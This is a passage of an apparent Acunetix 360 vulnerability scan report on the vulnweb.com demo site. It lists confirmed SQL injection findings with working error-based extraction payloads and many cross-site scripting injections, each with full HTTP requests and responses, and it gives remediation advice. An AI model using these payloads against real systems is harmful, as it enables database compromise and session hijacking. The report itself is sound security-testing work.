3.1. http://testphp.vulnweb.com/listproducts.php?artist=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)
CONFIRMED
CONFIRMED
Method Parameter Value
GET artist -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA...

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database Name

acuart

Identified Database User

acuart@localhost
Go to the highlighted output

Request

GET /listproducts.php?artist=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 198.2958
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	
Warning: mysql_query(): Unable to save result set in /hj/var/www/listproducts.php on line 67
Error: Duplicate entry '_!@4dilemma:1' for key 'group_key'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content --

3.2. http://testphp.vulnweb.com/listproducts.php?cat=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)
CONFIRMED
CONFIRMED
Method Parameter Value
GET cat -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHA...

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database Name

acuart

Identified Database User

acuart@localhost
Go to the highlighted output

Request

GET /listproducts.php?cat=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 202.7291
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	
Warning: mysql_query(): Unable to save result set in /hj/var/www/listproducts.php on line 61
Error: Duplicate entry '_!@4dilemma:1' for key 'group_key'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content --

3.3. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname
POST uemail
POST signup signup
POST uuname -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52...
POST uaddress
POST upass2
POST ucc
POST upass
POST uphone

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database Name

acuart

Identified Database User

acuart@localhost
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 362
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=&uemail=&signup=signup&uuname=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27&uaddress=&upass2=&ucc=&upass=&uphone=

Response

Response Time (ms) : 188.835
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:21 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	Unable to access user database: Duplicate entry '_!@4dilemma:1' for key 'group_key'

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.1

CVSS 3.0 SCORE
Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

4. Cross-site Scripting

HIGH
15
CONFIRMED
15

Acunetix 360 detected Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.    

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:
  • Hijacking user's active session.
  • Mounting phishing attacks.
  • Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

4.1. http://testphp.vulnweb.com/comment.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST Submit Submit
POST name </title><scRipt>netsparker(0x00C1D4)</scRipt>
POST phpaction echo $_POST[comment];
POST comment
Go to the highlighted output

Request

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 129
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/comment.php?aid=3
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Submit=Submit&name=%3c%2ftitle%3e%3cscRipt%3enetsparker(0x00C1D4)%3c%2fscRipt%3e&phpaction=echo+%24_POST%5bcomment%5d%3b&comment=

Response

Response Time (ms) : 196.2023
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:15:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
</title><scRipt>netsparker(0x00C1D4)</scRipt> commented</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<p class='story'></title><scRipt>netsparker(0x00C1D4)</scRipt>, thank you for your comment.</p><p class='story'><i></p></i></body>
</html>
4.2. http://testphp.vulnweb.com/guestbook.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST submit add message
POST name <scRipt>netsparker(0x00A07A)</scRipt>
POST text
Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&name=%3cscRipt%3enetsparker(0x00A07A)%3c%2fscRipt%3e&text=

Response

Response Time (ms) : 189.0436
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


v class="story">
	<table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong><scRipt>netsparker(0x00A07A)</scRipt></strong></td><td align="right" style="background-color:#F5F5F5">01.02.1970, 9:09 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="st

4.3. http://testphp.vulnweb.com/guestbook.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST submit add message
POST name anonymous user
POST text <scRipt>netsparker(0x00A0B1)</scRipt>
Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 91
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&name=anonymous+user&text=%3cscRipt%3enetsparker(0x00A0B1)%3c%2fscRipt%3e

Response

Response Time (ms) : 195.0827
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


ground-color:#F5F5F5"><strong>anonymous user</strong></td><td align="right" style="background-color:#F5F5F5">01.02.1970, 9:09 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;<scRipt>netsparker(0x00A0B1)</scRipt></td></tr></table>	 </div>
	  <div class="story">
	  	<form action="" method="post" name="faddentry">
			<input type="hidden" name="name" value="test">
			<textarea name="text" rows="5" wrap="VIRTUAL"

4.4. http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00AC40)%20x%3d%22
CONFIRMED
CONFIRMED
Method Parameter Value
GET pp x" onmouseover=netsparker(0x00AC40) x="
Go to the highlighted output

Request

GET /hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00AC40)%20x%3d%22 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 190.2572
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:10:22 GMT

<title>HTTP Parameter Pollution Example</title>

<a href="?pp=12">check</a><br/>
<a href="params.php?p=valid&pp=x%22+onmouseover%3Dnetsparker%280x00AC40%29+x%3D%22">link1</a><br/><a href="params.php?p=valid&pp=x" onmouseover=netsparker(0x00AC40) x="">link2</a><br/><form action="params.php?p=valid&pp=x" onmouseover=netsparker(0x00AC40) x=""><input type=submit name=aaaa/></form><br/>
<hr>
<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>
4.5. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x00BF39)%3c%2fscRipt%3e&pp=12
CONFIRMED
CONFIRMED
Method Parameter Value
GET aaaa%2f
GET p <scRipt>netsparker(0x00BF39)</scRipt>
GET pp 12
Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x00BF39)%3c%2fscRipt%3e&pp=12 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 195.285
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:14:28 GMT

<scRipt>netsparker(0x00BF39)</scRipt>12
4.6. http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x00BF46)%3c%2fscRipt%3e
CONFIRMED
CONFIRMED
Method Parameter Value
GET aaaa%2f
GET p valid
GET pp <scRipt>netsparker(0x00BF46)</scRipt>
Go to the highlighted output

Request

GET /hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x00BF46)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/?pp=12
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 188.4928
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:14:30 GMT

valid<scRipt>netsparker(0x00BF46)</scRipt>
4.7. http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x00B6A9)%3c%2fscRipt%3e
CONFIRMED
CONFIRMED
Method Parameter Value
GET artist <scRipt>netsparker(0x00B6A9)</scRipt>
Go to the highlighted output

Request

GET /listproducts.php?artist=%3cscRipt%3enetsparker(0x00B6A9)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 189.4979
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<scRipt>netsparker(0x00B6A9)</scRipt>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="

4.8. http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x009DCB)%3c%2fscRipt%3e
CONFIRMED
CONFIRMED
Method Parameter Value
GET cat <scRipt>netsparker(0x009DCB)</scRipt>
Go to the highlighted output

Request

GET /listproducts.php?cat=%3cscRipt%3enetsparker(0x009DCB)%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 195.3831
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


BeginEditable name="content_rgn" -->
<div id="content">
	Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=<scRipt>netsparker(0x009DCB)</scRipt>' at line 1
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
</div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="

4.9. http://testphp.vulnweb.com/search.php?test=query
CONFIRMED
CONFIRMED
Method Parameter Value
POST test query
POST goButton go
POST searchFor <scRipt>netsparker(0x0092D9)</scRipt>
Go to the highlighted output

Request

POST /search.php?test=query HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

goButton=go&searchFor=%3cscRipt%3enetsparker(0x0092D9)%3c%2fscRipt%3e

Response

Response Time (ms) : 193.9746
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


ut test</a>	</td>
	</tr></table>
  </div> 
</div> 
<!-- end masthead --> 

<!-- begin content -->
<!-- InstanceBeginEditable name="content_rgn" -->
<div id="content">
	<h2 id='pageName'>searched for: <scRipt>netsparker(0x0092D9)</scRipt></h2></div>
<!-- InstanceEndEditable -->
<!--end content -->

<div id="navBar"> 
  <div id="search"> 
    <form action="search.php?test=query" method="post"> 
      <label>search art</label> 
      <i

4.10. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail '"--></style></scRipt><scRipt>netsparker(0x00B2C1)</scRipt>
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 182
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail='"--></style></scRipt><scRipt>netsparker(0x00B2C1)</scRipt>&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 195.495
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:10:47 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: '"--></style></scRipt><scRipt>netsparker(0x00B2C1)</scRipt></li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
4.11. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname '"--></style></scRipt><scRipt>netsparker(0x00B3F4)</scRipt>
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname='"--></style></scRipt><scRipt>netsparker(0x00B3F4)</scRipt>&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 196.4136
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:10:51 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: '"--></style></scRipt><scRipt>netsparker(0x00B3F4)</scRipt></li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
4.12. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST uemail
POST urname
POST signup signup
POST uuname <scRipt>netsparker(0x00B66D)</scRipt>
POST uaddress
POST upass2
POST ucc
POST upass
POST uphone
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

uemail=&urname=&signup=signup&uuname=%3cscRipt%3enetsparker(0x00B66D)%3c%2fscRipt%3e&uaddress=&upass2=&ucc=&upass=&uphone=

Response

Response Time (ms) : 197.2952
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:23 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: <scRipt>netsparker(0x00B66D)</scRipt></li><li>Password: </li><li>Name: </li><li>Address: </li><li>E-Mail: </li><li>Phone number: </li><li>Credit card: </li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
4.13. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress '"--></style></scRipt><scRipt>netsparker(0x00B670)</scRipt>
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress='"--></style></scRipt><scRipt>netsparker(0x00B670)</scRipt>&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 189.0029
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
